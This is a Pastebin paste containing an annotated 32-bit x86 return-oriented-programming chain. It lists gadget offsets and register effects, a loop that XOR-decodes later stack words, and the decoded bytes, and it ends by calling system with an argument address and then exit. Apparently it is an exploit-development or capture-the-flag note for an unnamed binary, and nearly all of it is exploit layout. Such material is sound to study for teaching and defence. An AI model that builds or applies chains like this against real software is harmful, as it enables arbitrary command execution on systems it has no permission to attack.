Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 0 [ST] *POP EBP* | EBP=01010101
- 4 [79] POP ESI | ESI=FFFFFFF6
- 12 [7F] POP EBX | EBX=FFFFFFFF
- 20 [B7] NOT EBX | EBX=00000000
- 24 [A0] NEG ESI | ESI=0000000A
- 28 [81] ADD EBX,ESP | EBX=&BASE[32]
- 32 [84] ADD EBX,20 | EBX=&BASE[52]
- 36 [84] ADD EBX,20 | EBX=&BASE[72]
- 40 [84] ADD EBX,20 | EBX=&BASE[92]
- 44 [AA] MOV DPTR [EBX-4],ESP | BASE[88] = &BASE[48]
- 48 [88] MOV EAX, DPTR [EBX] | EAX = [EBX]
- 52 [9B] XOR EAX, EBP | EAX ^= 01010101
- 56 [A3] MOV DPTR [EBX], EAX | [EBX] = EAX
- 60 [7B] ADD EBX,4 | EBX += 4
- 64 [98] XOR EAX,EAX | EAX = 0
- 68 [8D] SUB ESI, 1 | ESI -= 1
- 72 [A6] RCR EAX, 28 | RCR(EAX, 28) # eax = esi < 0 ? 16 : 0
- 76 [C0] NO-OP (ret gadget) |
- 80 [AE] ADD ESP,EAX | ESP += EAX # if eax == 16 then next esp is 84+16=100
- 84 [9E] POP ESP | ESP = BASE[88]
- for (i in 92..132 step 4) {
- stack[dword i] ^= 01010101
- }
- memory after xor:
- C0 85 04 08 C0 85 04 08 C0 85 04 08
- D0 EC E5 F7
- C0 1E E5 F7
- 38 A0 04 08
- 00 00 00 00
- 92 [C0] NO-OP (ret gadget)
- 96 [C0] NO-OP (ret gadget)
- 100 [C0] NO-OP (ret gadget)
- 104 &system
- 108 &exit
- 112 system arg: 0804A038
- 116 exit arg: 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
